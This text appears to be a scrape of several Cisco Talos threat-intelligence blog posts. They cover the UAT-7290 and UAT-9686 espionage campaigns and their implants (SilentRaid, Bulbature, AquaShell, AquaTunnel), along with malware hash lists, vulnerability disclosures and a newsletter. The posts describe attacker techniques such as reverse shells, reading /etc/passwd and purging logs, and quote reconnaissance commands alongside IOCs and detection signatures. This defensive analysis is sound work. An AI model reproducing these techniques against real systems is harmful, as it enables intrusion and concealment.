Hazel is joined by Nick Biasini to reflect on what stood out, what surprised them, and what didn’t in 2025. What might defenders want to think about differently heading into 2026? 

**Upcoming events where you can find Talos **

*   JSAC (Jan. 21 – 23) Tokyo, Japan 
*   S4x26 (Feb. 23 – 26) Miami, FL

**Most prevalent malware files from Talos telemetry over the past week **

**SHA256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507**    
MD5: 2915b3f8b703eb744fc54c81f4a9c67f    
Talos Rep: https://talosintelligence.com/talos\_file\_reputation?s=9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507    
Example Filename: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507.exe    
Detection Name: Win.Worm.Coinminer::1201 

**SHA256: 90b1456cdbe6bc2779ea0b4736ed9a998a71ae37390331b6ba87e389a49d3d59**   
MD5: c2efb2dcacba6d3ccc175b6ce1b7ed0a    
Talos Rep: https://talosintelligence.com/talos\_file\_reputation?s=90b1456cdbe6bc2779ea0b4736ed9a998a71ae37390331b6ba87e389a49d3d59    
Example Filename: ck8yh2og.dll    
Detection Name: Auto.90B145.282358.in02 

**SHA256: 96fa6a7714670823c83099ea01d24d6d3ae8fef027f01a4ddac14f123b1c9974**    
MD5: aac3165ece2959f39ff98334618d10d9    
Talos Rep: https://talosintelligence.com/talos\_file\_reputation?s=96fa6a7714670823c83099ea01d24d6d3ae8fef027f01a4ddac14f123b1c9974    
Example Filename: 96fa6a7714670823c83099ea01d24d6d3ae8fef027f01a4ddac14f123b1c9974.exe    
Detection Name: W32.Injector:Gen.21ie.1201 

**SHA256: ecd31e50ff35f41fbacf4b3c39901d5a2c9d4ae64b0c0385d661b1fd8b00481f**    
MD5: e41ae00985e350137ddd9c1280f04fc3    
Talos Rep: https://talosintelligence.com/talos\_file\_reputation?s=ecd31e50ff35f41fbacf4b3c39901d5a2c9d4ae64b0c0385d661b1fd8b00481f    
Example Filename: tg-submit-JDs62cgS.exe    
Detection Name: Auto.ECD31E.252552.in02 

**SHA256: 1aa70d7de04ecf0793bdbbffbfd17b434616f8de808ebda008f1f27e80a2171b**    
MD5: a8fd606be87a6f175e4cfe0146dc55b2    
Talos Rep: https://talosintelligence.com/talos\_file\_reputation?s=1aa70d7de04ecf0793bdbbffbfd17b434616f8de808ebda008f1f27e80a2171b    
Example Filename: WCInstaller\_NonAdmin.exe    
Detection Name: W32.1AA70D7DE0-95.SBX.TG

Resolutions, shmesolutions (and what’s actually worked for me)

Talos assesses with high confidence that UAT-7290 is a sophisticated threat actor falling under the China-nexus of advanced persistent threat actors (APTs). UAT-7290 primarily targets telecommunications providers in South Asia.

Thursday, January 8, 2026 06:00

*   Cisco Talos is disclosing a sophisticated threat actor we track as UAT-7290, who has been active since at least 2022.
*   UAT-7290 is tasked with gaining initial access as well as conducting espionage focused intrusions against critical infrastructure entities in South Asia.
*   UAT-7290's arsenal includes a malware family consisting of implants we call RushDrop, DriveSwitch, and SilentRaid.
*   Our findings indicate that UAT-7290 conducts extensive technical reconnaissance of target organizations before carrying out intrusions.

Talos assesses with high confidence that UAT-7290 is a sophisticated threat actor falling under the China-nexus of Advanced Persistent Threat actors (APTs). UAT-7290 primarily targets telecommunications providers in South Asia. However, in recent months we have also seen UAT-7290 expand their targeting into Southeastern Europe.

In addition to conducting espionage focused attacks where UAT-7290 burrows deep inside a victim enterprise’s network infrastructure, their tactics, techniques and procedures (TTPs) and tooling suggests that this actor also establishes Operational Relay Box (ORBs) nodes. The ORB infrastructure may then be used by other China-nexus actors in their malicious operations, signifying UAT-7290's dual role as an espionage motivated threat actor as well as an initial access group.

Active since at least 2022, UAT-7290 has an expansive arsenal of tooling, including open-source malware, custom developed malware, and payloads for 1-day vulnerabilities in popular edge networking products. UAT-7290 primarily leverages a Linux based malware suite but may also utilize Windows based bespoke implants such as RedLeaves or Shadowpad commonly linked to China-nexus threat actors.

Our findings suggest that the threat actor conducts extensive reconnaissance of target organizations before carrying out intrusions. UAT-7290 leverages one-day exploits and target-specific SSH brute force to compromise public facing edge devices to gain initial access and escalate privileges on compromised systems. The actor appears to rely on publicly available proof-of-concept exploit code as opposed to developing their own.

UAT-7290 shares overlapping TTPs with known China-nexus adversaries, including the exploitation of high-profile vulnerabilities in networking devices, use of open-source web shells for persistence, leveraging UDP listeners, and using compromised infrastructure to facilitate operations.

Specifically, we have observed technical indicators that overlap with RedLeaves, a malware family attributed to APT10 (a.k.a. MenuPass, POTASSIUM and Purple Typhoon), as well as infrastructure associated with ShadowPad, a malware family used by a variety of China-nexus adversaries.

Additionally, UAT-7290 shares a significant amount of overlap in victimology, infrastructure, and tooling with a group publicly reported by Recorded Future as Red Foxtrot. In a 2021 report, Recorded Future linked Red Foxtrot to Chinese People’s Liberation Army (PLA) Unit 69010.

**UAT-7290's malware arsenal for edge devices**

Talos currently tracks the Linux-based malware families associated with UAT-7290 in this intrusion as:

*   RushDrop – The dropper that kickstarts the infection chain. RushDrop is also known as ChronosRAT.
*   DriveSwitch – A peripheral malware used to execute the main implant on the infected system.
*   SilentRaid – The main implant in the intrusion meant to establish persistent access to compromised endpoints. It communicates with its command-and-control server (C2) and carries out tasks defined in the malware. SilentRaid is also known as MystRodX.

Another malware implanted on compromised devices by UAT-7290 is Bulbature. Bulbature, first disclosed by Sekoia in late 2024, is an implant that is used to convert compromised devices into ORBs.

**RushDrop and DriveSwitch**

RushDrop is a malware dropper that consists of three binaries encoded and embedded within it. RushDrop first makes rudimentary checks to ensure it is running on a legitimate system instead of a sandbox.

Figure 1. RushDrop deleting itself if VM checks fail.

Then it either checks for the existence of, or creates a folder called “.pkgdb” in the current working directory of the dropper. RushDrop then decodes and drops three binaries to the “.pkgdb” folder:

*   “daytime” - A malware family that simply executes a file called “chargen” from the current working directory. This executor is being tracked as DriveSwitch.
*   “chargen” - The central implant of the infection chain, tracked as SilentRaid. SilentRaid communicates with its C2 server, usually in the form of a domain and can carry out action as instructed by the C2.
*   “busybox” - Busybox is a legitimate Linux utility that can be used to execute arbitrary commands on the system. 

Figure 2. RushDrop setting up files on disk.

 DriveSwitch simply executes the SilentRaid malware on the system.

Figure 3. DriveSwitch executing SilentRaid.

**SilentRaid: The multifunctional malware**

SilentRaid is a malware written in C++ and consists of multiple functionalities, written in the form of “plugins” embedded in the malware. On execution, it does certain rudimentary anti-VM and analysis checks to ensure it isn’t running in a sandbox. Then the malware simply initializes its “plugins” and contacts the C2 server for instructions to carry out malicious tasks on the infected endpoint. The plugins are built in functionalities, but modular enough to enable the threat actor to stitch together a combination of them during compilation.

**Plugin: my\_socks\_mgr**

This plugin handles communication to C2 server. It obtains the C2 IP by resolving a domain using “8\[.\]8\[.\]8\[.\]8” and passes commands received from the C2 to the appropriate plugin.

**Plugin:my\_rsh**

This plugin opens a remote shell by executing “sh” either via either “busybox” or “/bin/sh”. This remote shell is then used to run arbitrary commands on the infected system.

**Plugin:port\_fwd\_mgr**

This plugin sets up port forwarding between ports specified — a local port and a port on a remote server. It can also set up port forwarding across multiple ports.

**Plugin:my\_file\_mgr**

This is the file manager of the backdoor. It allows the SilentRaid to:

*   Read contents of “/etc/passwd”
*   Execute a specified file on the system
*   Archive directories specified by the C2 using “tar -cvf” - executed via busybox
*   Check if a file is accessible
*   Remove a file or directory using the “rm” command - via busybox
*   Read/write a specified file

SilentRaid can also parse thru x509 certificates and collect attribute information such as:

*   id-at-dnQualifier | Distinguished Name qualifier
*   id-at-pseudonym | Pseudonym
*   id-domainComponent | Domain component
*   id-at-uniqueIdentifier | Unique Identifier

**Bulbature**

The Bulbature malware discovered consisted of the same string encoding scheme as the other UAT-7290's malware illustrated earlier. Usually UPX compressed, Bulbature can bind to and listen to either a random port of its choosing or one specified via command line via the “-d <port\_number>” switch.

Bulbature obtains the local network interface’s name by executing the command:

cat /proc/net/route | awk '{print $1,$2}' | awk '/00000000/ {print $1}'

It also obtains basic system information and the current user using the command:

echo $(whoami) $(uname -nrm)

The malware typically records its C2 address in a config file in the /tmp directory. The file will have the same name as the malware binary with the “.cfg” extension appended to it. The C2 address may be an encoded string.

Bulbature can obtain additional or new C2 addresses from the current C2 and can switch over communications with them instead. The malware can open up a reverse shell with its C2 to execute arbitrary commands on the infected system.

A recent variant of Bulbature contained an embedded self-signed certificate that it used for communicating with the C2. This certificate matches the one from the sample disclosed by Sekoia as well:

509 Certificate:
Version: 3
Serial Number: 81bab2934ee32534
Signature Algorithm:
    Algorithm ObjectId: 1.2.840.113549.1.1.11 sha256RSA
    Algorithm Parameters:
    05 00
Issuer:
    O=Internet Widgits Pty Ltd
    S=Some-State
    C=AU
  Name Hash(sha1): d398f76c7ba0bbf79b1cac0620cdf4b42e505195
  Name Hash(md5): 4a963519b4950845a8d76668d4d7dd29
 
NotBefore: 8/8/2019 3:33 AM
NotAfter: 12/24/2046 3:33 AM
 
Subject:
    O=Internet Widgits Pty Ltd
    S=Some-State
    C=AU
  Name Hash(sha1): d398f76c7ba0bbf79b1cac0620cdf4b42e505195
  Name Hash(md5): 4a963519b4950845a8d76668d4d7dd29
 
Cert Hash(sha256): 918fb8af4998393f5195bafaead7c9ba28d8f9fb0853d5c2d75f10e35be8015a

Censys data shows that this certificate, with the exact Serial number, is present on at least 141 hosts, all either located in China or Hong Kong. On Virus Total, many of the IPs identified hosting this certificate are associated with other malware typically associated with China-nexus of threat actors such as SuperShell, GobRAT, Cobalt Strike, etc.

**Coverage**

The following ClamAV signatures detect and block this threat:

*   Unix.Dropper.Agent
*   Unix.Malware.Agent
*   Unix.Packed.Agent

The following Snort Rule (SIDs) detects and blocks this threat: 65124

**IOCs**

723c1e59accbb781856a8407f1e64f36038e324d3f0bdb606d35c359ade08200

59568d0e2da98bad46f0e3165bcf8adadbf724d617ccebcfdaeafbb097b81596

961ac6942c41c959be471bd7eea6e708f3222a8a607b51d59063d5c58c54a38d

**Covered Services**

UAT-7290 targets high value telecommunications infrastructure in South Asia

What happens under the hood of Cisco's security portfolio? Our reputation and detection services apply Talos' real-time intelligence to detect and block threats. Here's how.

Wednesday, January 7, 2026 06:00

Cisco Talos is Cisco’s threat intelligence and security research organization that powers Cisco’s product portfolio with that intelligence. While we are well known for the security research in our blog, vulnerability discoveries, and our open-source software, you may not be aware of exactly how our know-how protects Cisco customers.

Talos’ core mission is to understand the broad threat landscape and distill the massive amount of telemetry we ingest into actionable intelligence. This intelligence is put to use in detecting and defending against threats with speed and accuracy, providing incident response and empowering our customers, constituents, and communities with context-rich actionable cyber intelligence. Under the hood of Cisco’s security portfolio, you will find our reputation and detection services applying our real time intelligence to detect and block threats.

**Defending networks**

Possibly our best-known service is the Cisco Talos Network Intrusion Prevention system, widely known as SNORT®. Snort performs deep packet inspection on network traffic, using advanced signature-based detection to identify known threats. In addition, its machine learning-powered component, SnortML, helps detect and block attempts to exploit zero-day vulnerabilities, providing robust protection against both familiar and emerging network attacks.

**Securing the web**

The core of securing our customers across our product portfolio is Cisco Talos Web Filtering Service. This service considers the reputation and categorization of domains, IP addresses, and indicators surrounding the URL. The service can proactively block web traffic to sites that have a poor reputation or that serve content in contravention of a customer’s web use policy.

The Cisco Talos DNS Security service augments our web filtering by defending specific attacks at the DNS layer. It detects domains used by threat actors for command and control (C2), data exfiltration, and phishing attacks. Behind the scenes, our machine learning algorithms constantly analyze patterns in the DNS traffic to identify new malicious domains to add to our own intelligence.

**Protecting your inbox**

Cisco Talos Email Filtering analyzes a wide range of indicators within email to determine if it is malicious, spam, or a genuine email. This includes assessing the sender’s domain and IP reputation and behavior, examining URLs and the content they reference, and evaluating the body of the email, header, and any attachments. By combining these factors, our email filtering can identify benign messages, spam, phish, as well as other unwanted messages.

Cisco Talos Email Threat Prevention goes one step further than DMARC, the standard for properly handling emails with inaccurate sender data, by analyzing anomalies in email traffic patterns with AI, to identify when brands are being impersonated. This technology can detect when an email is likely to be a phish or a business email compromise attempt.

**Detecting malware**

Talos provides two complementary technologies to detect malware: Cisco Talos Antivirus and Cisco Talos Malware Protection. The former provides signature and pattern detection of malware within files to identify known malware, similar to our ClamAV open-source product. The latter goes further, checking the dispositions of unknown files and looking for suspicious behavior on the machine. This layered approach allows us to quickly spot and contain threats while our researchers scour telemetry for any indications that a bad actor has gained access to a device.

We also provide Orbital queries and scripts, a platform by which administrators can collect information from networked devices and use their own queries (or those provided by us) to hunt for devices that are insecure, out of policy, or potentially affected by a security incident.

**Summary**

You can find Talos’ intelligence integrated into a wide variety of Cisco products:

Our published research and threat intelligence reports represent just a small part of the work we do at Talos. The many hours our researchers, analysts, and engineers spend researching the threat environment and developing systems to detect and block attacks bear fruit in the components that we deploy as part of the Cisco Security portfolio. Our intelligence and know-how protect Cisco Security customers from threats, brand new or decades old.

_Note_: _You can benefit from the experience of our analysts directly through a_ _Cisco Talos Incident Response_ _(Talos IR) retainer. While Talos IR can provide relevant threat information and expert emergency incident response, you can also use our proactive services to help prepare your systems, support and train your team, or actively hunt for bad guys on your network._

How Cisco Talos powers the solutions protecting your organization

This week, Joe laments on 2025, and what we can think of in 2026 in the wild world of cybersecurity.

Thursday, December 18, 2025 14:00

Welcome to this week’s edition of the Threat Source newsletter. 

For us in America, we’re in the holiday doldrums and things slow and/or shut down until the new year. At Cisco, we shut down the last week of the year to reset and recharge, and I’ve grown to be quite fond of it. I’ve worked plenty of gigs where there were no holiday breaks, and now that I’m living that dream, I gotta tell ya, it’s a damn civilized way to live if you can get it. 

It’s only natural for us to think on 2025 — what happened to us, what made the news, and with some trepidation (and maybe some hope) what lies in store for 2026. 

I thought I’d summarize the notable things that come to mind for me:

1.  Uncovering Qilin attack methods exposed through multiple cases   
    Why this one? Quilin is one of the more aggressive cartels that I see in the ransomware space in 2025. On their dark web site, you can see a very active presence. When Talos crunches the numbers for the 2025 Year in Review, don’t be surprised if you see them at the top of the list as one of the more lucrative criminal cartels. Our blog post on this was outstanding — give it a read! (Also, our banner art is just great, if I do say so myself. Our design team is the best.) I think 2026 will see a heavy ransomware tempo. It is simply just too lucrative for the bad guys. Compounding this is the macro/micro world economy and good old fashioned geopolitical tensions. Everyone hold on tight. 
2.  Jaguar Land Rover posts heavy loss after cyber attack   
    As someone who focuses on industrial control security, seeing a manufacturer getting hit so hard resonates with me. It proves the fragility that we see in this space, where operational and information technology mix to fulfill business imperatives, but at a real financial risk.  This will be a case study of financial impacts cyber attacks can have on manufacturing with a heavily targeted vertical because the disruptions are costly and lucrative to ransomware actors. My bet is 2026 will see much more of this. _No one_ wants to be the next Land Rover Jaguar. The bad guys know this, and there’s certainly blood in the water and the sharks have noticed. 
3.  Disrupting the first reported AI-orchestrated cyber espionage campaign   
    Anthropic released a first of its kind report on a state-sponsored adversary using Claude to launch a full kill chain campaign against victims. I had a hard time with this report. It felt (and still feels) hyped to a degree. It’s an entirely plausible scenario, and I don’t want to imply it’s misleading! But the report doesn’t show its work. You can certainly see this being real, but it just misses the test for actual substantive intel. Still, it surely does make one wonder how much better AI attacks will get. The space is moving at blazing speed. Who’s to say what 2026 will show us for attacks and defense!

If you celebrate, enjoy the holidays. At the same time, I know this season can feel especially lonely for those of us who are missing loved ones. This year I lost my grandmother, and I am still processing the tremendous grief and loss for someone who helped raise me to be the man I am today. Find the time to spend with others and be kind to yourself. Resist the urge to isolate yourself. Use the holidays to invest in yourself and your health. I believe in you. I’ll see you all in 2026.

**The one big thing **

For this end-of-year Talos Takes episode — and Hazel’s last as host — we took a time machine back to 2015 to ask, “What would a defender from back then think of the madness we deal with in 2025?” Alongside Pierre, Alex, and yours truly, we reminisced about our own journeys, then got into the real meat: just how much ransomware has exploded (thanks, “as-a-service” model), why identity is now the main battleground, and how the lines between state-sponsored actors and APTs have blurred to the point of being almost meaningless. 

**Why do I care? **

You don’t need me to tell you it’s a different world than it was ten years ago. The ransomware industry is bigger and nastier than ever, and attackers are more organized, more efficient, and more professionalized. The tools (and the stakes) keep changing, but burnout and complexity are constants. If you’re not keeping pace, you’re falling behind, and the attackers aren’t waiting up. 

**So now what? **

Don’t panic, and don’t try to win it all alone. Double down on the basics, like identity and access management and keeping tabs on those “service accounts” that keep multiplying. Make sure your team is trained, supported, and has permission to step away from the keyboard once in a while. Don’t get distracted by AI; it _is_ powerful, but it’s not a magic bullet. And maybe most important of all: Take care of yourself and your people. 2026 is going to bring more of the same (and some surprises), but if you stay grounded, curious, and human, you’ll be ready for whatever’s next. 

**Top security headlines of the week **

**Microsoft: Recent Windows updates break VPN access for WSL users**   
This known issue affects users who installed the KB5067036 October 2025 non-security update, released October 28th, or any subsequent updates, including the KB5072033 cumulative update released during this month's Patch Tuesday. (Bleeping Computer) 

**French Interior Ministry confirms** **cyber attack** **on email servers**   
While the attack (detected overnight between Thursday, December 11, and Friday, December 12) allowed the threat actors to gain access to some document files, officials have yet to confirm whether data was stolen. (Bleeping Computer) 

**In-the-wild** **exploitation of** **fresh Fortinet** **flaws** **begins**   
The two flaws (CVE-2025-59718 and CVE-2025-59719 \[CVSS score of 9.8\]) are described as improper verification of cryptographic signature issues impacting FortiOS, FortiWeb, FortiProxy, and FortiSwitchManager. (SecurityWeek) 

**Google to shut down dark web monitoring tool in February 2026**    
Google has announced that it's discontinuing its dark web report tool in February 2026, less than two years after it was launched as a way for users to monitor if their personal information is found on the dark web. (The Hacker News) 

**Compromised IAM** **credentials** **power a** **large AWS** **crypto** **mining** **campaign**   
The activity, first detected on Nov. 2, 2025, employs never-before-seen persistence techniques to hamper incident response and continue unimpeded, according to a new report shared by the tech giant ahead of publication. (The Hacker News) 

**Can’t get enough Talos? **

**Humans of Talos: Lexi DiScola**   
Amy chats with Senior Cyber Threat Analyst Lexi DiScola, who brings a political science and French background to her work tracking global cyber threats. Even as most people wind down for the holidays, Lexi is tackling the Talos 2025 Year in Review.

**UAT-9686 actively targets Cisco Secure Email Gateway and Secure Email and Web Manager**   
Our analysis indicates that appliances with non-standard configurations, as described in Cisco's advisory, are what we have observed as being compromised by the attack. 

**TTP:** **Talking** **through a** **year of** **cyber** **threats, in** **five** **questions**   
In this episode of the Talos Threat Perspective, Hazel is joined by Talos' Head of Outreach Nick Biasini to reflect on what stood out, what surprised them, and what didn’t in 2025. What might defenders want to think about differently as we head into 2026? 

**Upcoming events where you can find Talos **

We'll be back in 2026 — see ya then!

**Most prevalent malware files from Talos telemetry over the past week **

**SHA256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507**    
MD5: 2915b3f8b703eb744fc54c81f4a9c67f    
Talos Rep: https://talosintelligence.com/talos\_file\_reputation?s=9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507    
Example Filename: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507.exe   
Detection Name: Win.Worm.Coinminer::1201 

**SHA256: a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91**    
MD5: 7bdbd180c081fa63ca94f9c22c457376 Talos Rep: https://talosintelligence.com/talos\_file\_reputation?s=a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91    
Example Filename: e74d9994a37b2b4c693a76a580c3e8fe\_3\_Exe.exe    
Detection Name: Win.Dropper.Miner::95.sbx.tg 

**SHA256: 96fa6a7714670823c83099ea01d24d6d3ae8fef027f01a4ddac14f123b1c9974**    
MD5: aac3165ece2959f39ff98334618d10d9    
Talos Rep: https://talosintelligence.com/talos\_file\_reputation?s=96fa6a7714670823c83099ea01d24d6d3ae8fef027f01a4ddac14f123b1c9974    
Example Filename: 96fa6a7714670823c83099ea01d24d6d3ae8fef027f01a4ddac14f123b1c9974.exe    
Detection Name: W32.Injector:Gen.21ie.1201 

**SHA256: 90b1456cdbe6bc2779ea0b4736ed9a998a71ae37390331b6ba87e389a49d3d59**   
MD5: c2efb2dcacba6d3ccc175b6ce1b7ed0a   
Talos Rep: https://talosintelligence.com/talos\_file\_reputation?s=90b1456cdbe6bc2779ea0b4736ed9a998a71ae37390331b6ba87e389a49d3d59    
Example Filename:ck8yh2og.dll    
Detection Name: Auto.90B145.282358.in02 

**SHA256: 1aa70d7de04ecf0793bdbbffbfd17b434616f8de808ebda008f1f27e80a2171b**    
MD5: a8fd606be87a6f175e4cfe0146dc55b2    
Talos Rep: https://talosintelligence.com/talos\_file\_reputation?s=1aa70d7de04ecf0793bdbbffbfd17b434616f8de808ebda008f1f27e80a2171b    
Example Filename: 1aa70d7de04ecf0793bdbbffbfd17b434616f8de808ebda008f1f27e80a2171b.exe    
Detection Name: W32.1AA70D7DE0-95.SBX.TG

Adios 2025, you won’t be missed

Cisco Talos’ Vulnerability Discovery & Research team recently disclosed vulnerabilities in Biosig Project Libbiosig, Grassroot DiCoM, and Smallstep step-ca.
The vulnerabilities mentioned in this blog post have been patched by their respective vendors, all in adherence to Cisco’s third-party vulnerability disclosure policy, except for Grassroot, as the

Wednesday, December 17, 2025 16:02

Cisco Talos’ Vulnerability Discovery & Research team recently disclosed vulnerabilities in Biosig Project Libbiosig, Grassroot DiCoM, and Smallstep step-ca.

The vulnerabilities mentioned in this blog post have been patched by their respective vendors, all in adherence to Cisco’s third-party vulnerability disclosure policy, except for Grassroot, as the DiCoM vulnerabilities are zero-days.

For Snort coverage that can detect the exploitation of these vulnerabilities, download the latest rule sets from Snort.org, and our latest Vulnerability Advisories are always posted on Talos Intelligence’s website.     

****Libbiosig vulnerability****

_Discovered by Mark Bereza of Cisco Talos._

BioSig is an open source software library for biomedical signal processing. The BioSig Project seeks to encourage research in biomedical signal processing by providing open source software tools.

TALOS-2025-2296 (CVE-2025-66043-CVE-2025-66048) includes several stack-based buffer overflow vulnerabilities in the MFER parsing functionality of the Biosig Project libbiosig 3.9.1. An attacker can supply a specially crafted MFER file to trigger these vulnerabilities, possibly leading to arbitrary code execution.

_Discovered by Emmanuel Tacheau of Cisco Talos._

Grassroots DiCoM is a C++ library for DICOM medical files, accessible from Python, C#, Java, and PHP. It supports RAW, JPEG, JPEG 2000, JPEG-LS, RLE and deflated transfer syntax. Talos found three out-of-bounds read vulnerabilities in DiCoM. An attacker can provide a malicious file to trigger these vulnerabilities.

*   TALOS-2025-2210 (CVE-2025-53618-CVE-2025-53619) can lead to an information leak. 
*   TALOS-2025-2211 (CVE-2025-52582) can lead to an information leak.
*   TALOS-2025-2214 (CVE-2025-48429) can lead to leaking heap data. 

****Smallstep step-ca vulnerabilities****

_Discovered by Stephen Kubik of the Cisco Advanced Security Initiatives Group (ASIG)._

Smallstep step-ca is a TLS-secured online Certificate Authority (CA) for X.509 and SSH certificate management. TALOS-2025-2242 (CVE-2025-44005) is an authentication bypass vulnerability in step-ca. An attacker can bypass authorization checks and force a Step-CA ACME or SCEP provisioner to create certificates without completing certain protocol authorization checks.

Libbiosig, Grassroot DiCoM, Smallstep step-ca vulnerabilities

Cisco Talos is tracking the active targeting of Cisco AsyncOS Software for Cisco Secure Email Gateway, formerly known as Cisco Email Security Appliance (ESA), and Cisco Secure Email and Web Manager, formerly known as Cisco Content Security Management Appliance (SMA).

Wednesday, December 17, 2025 11:55

*   Cisco Talos recently discovered a campaign targeting Cisco AsyncOS Software for Cisco Secure Email Gateway, formerly known as Cisco Email Security Appliance (ESA), and Cisco Secure Email and Web Manager, formerly known as Cisco Content Security Management Appliance (SMA).
*   We assess with moderate confidence that the adversary, who we are tracking as UAT-9686, is a Chinese-nexus advanced persistent threat (APT) actor whose tool use and infrastructure are consistent with other Chinese threat groups.
*   As part of this activity, UAT-9686 deploys a custom persistence mechanism we track as “AquaShell” accompanied by additional tooling meant for reverse tunneling and purging logs.
*   Our analysis indicates that appliances with non-standard configurations, as described in Cisco's advisory, are what we have observed as being compromised by the attack.

Cisco Talos is tracking the active targeting of Cisco AsyncOS Software for Cisco Secure Email Gateway, formerly known as Cisco Email Security Appliance (ESA), and Cisco Secure Email and Web Manager, formerly known as Cisco Content Security Management Appliance (SMA), enabling attackers to execute system-level commands and deploy a persistent Python-based backdoor, AquaShell. Cisco became aware of this activity on December 10, which has been ongoing since at least late November 2025. Additional tools observed include AquaTunnel (reverse SSH tunnel), chisel (another tunneling tool), and AquaPurge (log-clearing utility). Talos' analysis indicates that appliances with non-standard configurations, as described in Cisco's advisory, are what we have observed as being compromised by the attack.

The Cisco Secure Email and Web Manager centralizes management and reporting functions across multiple Cisco Email Security Appliances (ESAs) and Web Security Appliances (WSAs), offering centralized services such as spam quarantine, policy management, reporting, tracking, and configuration management to simplify administration and enhance security enforcement.

Customers are strongly advised to follow the guidance published in the security advisories discussed below. Additional recommendations specific to Cisco are available here.

Talos assesses with moderate confidence that this activity is being conducted by a Chinese-nexus threat actor, which we track as UAT-9686. We have observed overlaps in tactics, techniques and procedures (TTPs), infrastructure, and victimology between UAT-9686 and other Chinese-nexus threat actors Talos tracks. Tooling used by UAT-9686, such as AquaTunnel (aka ReverseSSH), also aligns with previously disclosed Chinese-nexus APT groups such as APT41 and UNC5174. Additionally, the tactic of using a custom-made web-based implant such as AquaShell is increasingly being adopted by highly sophisticated Chinese-nexus APTs.

**AquaShell**

AquaShell is a lightweight Python backdoor that is embedded into an existing file within a Python-based web server. The backdoor is capable of receiving encoded commands and executing them in the system shell. It listens passively for unauthenticated HTTP POST requests containing specially crafted data. If such a request is identified, the backdoor will then attempt to parse the contents using a custom decoding routine and execute them in the system shell.

AquaShell is delivered as an encoded data blob that is decoded and ultimately placed in “/data/web/euq\_webui/htdocs/index.py”.

The result of decoding the data blob is the Python code that constitutes the AquaShell backdoor. AquaShell parses the HTTP POST request, decodes it using a combination custom algorithm and Base64 decoding and executes the resulting commands on the appliance.

**AquaPurge**

AquaPurge removes lines containing specific keywords from the log files specified. It uses the “egrep” command  to filter out (invert search) all content that doesn’t contain the keywords and then simply commits them to the log files:

**AquaTunnel**

AquaTunnel is a compiled GoLang ELF binary based on the open-source “ReverseSSH” backdoor. AquaTunnel creates a reverse SSH connection from the compromised system back to an attacker‑controlled server, enabling unauthorized remote access even when the system is behind firewalls or NAT.

**Chisel**

Chisel is an open‑source tunneling tool that supports creating TCP/UDP tunnels over a single‑port HTTP‑based connection. Chisel allows an attacker to proxy traffic through a compromised edge device, allowing them to easily pivot through that device into the internal environment.

Recommendations for Cisco customers are available here. If your organization does find connections to the provided actor indicators of compromise (IOCs), please open a case with Cisco TAC.

All IOCs, including IPs and file hashes determined to be associated with this campaign have been blocked across the Cisco portfolio.

**IOCs**

The IOCs can also be found in our GitHub repository here.

**AquaTunnel**

2db8ad6e0f43e93cc557fbda0271a436f9f2a478b1607073d4ee3d20a87ae7ef

**AquaPurge**

145424de9f7d5dd73b599328ada03aa6d6cdcee8d5fe0f7cb832297183dbe4ca

**Chisel**

85a0b22bd17f7f87566bd335349ef89e24a5a19f899825b4d178ce6240f58bfc

172\[.\]233\[.\]67\[.\]176

172\[.\]237\[.\]29\[.\]147

38\[.\]54\[.\]56\[.\]95